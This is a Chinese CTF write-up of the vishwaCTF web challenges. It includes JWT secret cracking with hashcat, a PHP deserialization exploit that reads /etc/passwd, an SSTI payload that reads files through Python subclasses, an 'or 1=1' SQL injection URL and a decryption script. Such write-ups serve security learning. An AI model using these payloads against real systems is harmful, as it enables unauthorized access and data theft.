【vishwaCTF】web题解wp

  • web
    • Keep Your Secrets(jwt典例)
    • Todo list(php反序列化)
    • Hey Buddy!(SSTI)
    • My Useless Website(SQL注入)
    • Stock Bot(信息检索)
    • Request Me FLAG(数据包请求方式)
    • Strong Encryption(php代码审计)

web

Keep Your Secrets(jwt典例)

一打开发现有两个页面,一个页面是注册,一个是admin管理员页面

注册完成之后会返回一段字符串,分析得到这是一段Token:

那么我们就可以利用这段Token伪造管理员请求去得到flag
打开jwt.io:要爆破的就是下面这个检验码
打开hashcat,设置掩码爆破或者暴力爆破,5分钟出来了:
或者rockyou.txt,很多密码,秒出结果
密钥是:owasp

最后POST请求提交作为请求头的Token即可,要放在中间,放在包最后会发生未知错误

hashcat -a -0 代表字典攻击
-m 16500 代表破解的是jwt
hashcat的wiki:hashcat_WiKi 和 hashcat手册
–show代表直接把密钥显示出来

-a  指定要使用的破解模式,其值参考后面对参数。“-a 0”字典攻击,“-a 1” 组合攻击;“-a 3”掩码攻击。
-m  指定要破解的hash类型,如果不指定类型,则默认是MD5
-o  指定破解成功后的hash及所对应的明文密码的存放位置,可以用它把破解成功的hash写到指定的文件中
--force 忽略破解过程中的警告信息,跑单条hash可能需要加上此选项
--show  显示已经破解的hash及该hash所对应的明文
--increment  启用增量破解模式,你可以利用此模式让hashcat在指定的密码长度范围内执行破解过程
--increment-min  密码最小长度,后面直接等于一个整数即可,配置increment模式一起使用
--increment-max  密码最大长度,同上
--outfile-format 指定破解结果的输出格式id,默认是3
--username   忽略hash文件中的指定的用户名,在破解linux系统用户密码hash可能会用到
--remove     删除已被破解成功的hash
-r       使用自定义破解规则

Todo list(php反序列化)

<?php
Class ShowSource{public function __toString(){return highlight_file($this->source, true);}
}if(isset($_GET['source'])){$s = new ShowSource();$s->source = __FILE__;echo $s;exit;
}$todos = [];if(isset($_COOKIE['todos'])){$c = $_COOKIE['todos'];$h = substr($c, 0, 40);$m = substr($c, 40);if(sha1($m) === $h){$todos = unserialize($m);}
}if(isset($_POST['text'])){$todo = $_POST['text'];$todos[] = $todo;$m = serialize($todos);$h = sha1($m);setcookie('todos', $h.$m);header('Location: '.$_SERVER['REQUEST_URI']);exit;
}foreach($todos as $todo):<label class="todo"><input class="todo__state" type="checkbox" /><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 200 25" class="todo__icon"><use xlink:href="#todo__line" class="todo__line"></use><use xlink:href="#todo__box" class="todo__box"></use><use xlink:href="#todo__check" class="todo__check"></use><use xlink:href="#todo__circle" class="todo__circle"></use></svg><div class="todo__text"><?=$todo?></div></label><?php endforeach;

echo触发 __toString
exp:

<?php
Class ShowSource{public function __construct(){$this->source = '/etc/passwd'; //flag.php}
}
$todos[]=new ShowSource();
echo sha1(serialize($todos));
echo urlencode(serialize($todos));

Hey Buddy!(SSTI)

payload:

{{().__class__.__bases__[0].__subclasses__()[99](path=%27%27,fullname=%27%27).get_data(%27./flag.txt%27)}}

使用subclasses的第99个库,这个库里有os操作,就可以获取flag

My Useless Website(SQL注入)

直接万能密码注释掉后面就可以了
payload:

https://my-us3l355-w3b51t3.vishwactf.com/?user=1%27%20or%201=1–+&pass=1

-+ 或者 ·--就是注释符

Stock Bot(信息检索)

出现了一段payload:
根据:if(!msg.includes(‘Flag’))
猜测product=Flag,得到flag

Request Me FLAG(数据包请求方式)

以FLAG请求方式请求数据包,得到flag

Strong Encryption(php代码审计)

<?php// Decrypt -> 576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982452f12f4712f4c769a75b33cb995fa169056168939a8b0b28eafe0d724f18dc4a7$flag="";function encrypt($str,$enKey){$strHex='';$Key='';$rKey=69;$tmpKey='';for($i=0;$i<strlen($enKey);$i++){$Key.=ord($enKey[$i])+$rKey;  //ord()将字符转为10进制$tmpKey.=chr(ord($enKey[$i])+$rKey); //chr()10进制转为字符}    $rKeyHex=dechex($rKey); //10进制转为16进制$enKeyHash = hash('sha256',$tmpKey);for ($i=0,$j=0; $i < strlen($str); $i++,$j++){if($j==strlen($Key)){$j=0;}$strHex .= dechex(ord($str[$i])+$Key[$j]);}$encTxt = $strHex.$rKeyHex.$enKeyHash;return $encTxt;}$encTxt = encrypt($flag, "VishwaCTF");echo $encTxt;?>

解密脚本:
原过程是每位的十进制加上key再转16进制,反推这个过程就可以得到flag

$str2 = "576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982";
$Key='155174184173188166136153139';   for ($i=0,$j=0; $i < strlen($str2); $i++,$j++){if($j==strlen($Key)){$j=0;}$a = $str2[$i].$str2[$i+1];$flag .= chr(hexdec($a)-$Key[$j]);  $i++;}
echo "flag: ".$flag;

【vishwaCTF】web题解wp相关推荐

  1. 【vishwaCTF】misc题解wp

    [vishwaCTF]misc题解wp MISC Epistemus(信息检索.Twitter 隐写和cat命令) So Forgetful!(流量包) The Last Jedi(binwalk和信 ...

  2. [津门杯]全部WEB题解

    津门杯WEB题解 日常比赛被爆,感谢队里教我题的大师傅 power_cut 存在一个.index.php.swp文件,vim -r 恢复一下 <?php class logger{public ...

  3. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])...

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  4. I春秋CTF训练营web题解(一)

    I春秋CTF训练营web题解(一) (1)include ==hint:没错!就是文件包含漏洞.== 点开链接,发现 通过源码可知可以提交一个path的变量,通过ctrl+f搜索allow_url_i ...

  5. 【Hgame2022】第一周misc和web题解

    [Hgame2022]第一周misc和web题解 MISC 这个压缩包有点麻烦 暴力破解 字典爆破 明文爆破 压缩包伪加密 好康的流量 解法一 解法二 群青(其实是幽灵东京) 查看属性得知是基础的si ...

  6. ichunqiu Web SQli wp

    2020.1.10 菜鸡今天又来水题了. 其实这个题,不是很水[狗头]在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了.咋一看还蛮友 ...

  7. [BJDCTF 2nd] Web复现 wp

    文章目录 [BJDCTF 2nd] fake google [BJDCTF 2nd]old-hack [BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]duangShell [BJDCT ...

  8. mysql 南邮ctf_南邮ctf之web之wp

    下面是所有现在可以做的web题的wp! 建议使用CTRL+F查找所需题目,我都有标注!这样方便! 1.签到题 直接查看源码即可 2.md5 collision 解读代码: $md51 = md5('Q ...

  9. 衡师11月月赛web题目wp

    目录 1.丢三落四的学姐 2.wep?Pwn!!! 这题web部分是buuctf中的DASCTF X GFCTF 2022十月挑战赛!的原题 1.丢三落四的学姐 访问题目位置,很明显的phpstudy ...

  10. catf1ag Web writeup(wp) 可能会持续更新

    文章目录 命令执行之我在干什么 签到题 webshell 无字符webshell int 命令执行 <我的女友是机器人> 变量覆盖_extract 等于False 啥都没了 文件包含 st ...

最新文章

  1. 服务器架设笔记——使用Apache插件解析简单请求
  2. 首张人类黑洞照片的背后
  3. 优秀的程序反而是廉价
  4. 如何在asp.net mvc3中使用HttpStatusCode
  5. 到底什么时候用指针或是引用
  6. 手写bind_深入理解 JavaScript 之手写 call, apply, bind 方法
  7. html 布局满屏,CSS全屏布局的5种方式
  8. beta:scrum5
  9. wps图表xy轴颠倒_用EXCEL来搞艺术之图表类型变换
  10. 毕业设计10-22星期日
  11. java图片转换pdf_Java实现图片转换PDF文件的示例代码
  12. SDUT 2170 The Largest SCC bfs+tarjan
  13. 普林斯顿微积分读本篇三:极限导论
  14. 如何制作/输入 英语/美语音标
  15. linux内存映射对开发版刷屏,TQ6410/OK6410裸机LCD刷屏程序借助UBOOT来执行
  16. 劳动节前得空半天-总结一下最近使用的LINUX命令
  17. 利用MPU6050 + OLED屏显示3D矩形效果
  18. 2020年测试面试经历以及面试题大全
  19. Android Studio实现百度地图定位
  20. 这是什么在线客服系统?

热门文章

  1. 脉冲宽度调制pdm_脉冲宽度调制,脉宽调制
  2. 美图秀秀 web开发图片编辑器
  3. 2017年网易校招Java面试题
  4. CSS设置字体为微软雅黑 且 解决用户设备上没有该字体的问题
  5. 字节跳动开启员工暴富计划,大手笔回购期权,有人最高能赚175%
  6. 小米 红米【AC2100】一键刷BREED【30秒刷完】小白脑残专用 无需工具TELNET + 检查坏块
  7. 如何提高自己的工作能力 高效工作方法是绝效
  8. 激荡三十年(珍藏图文版)
  9. Android ViewGroup中addView方法使用
  10. 大数据定价方法的国内外研究综述及对比分析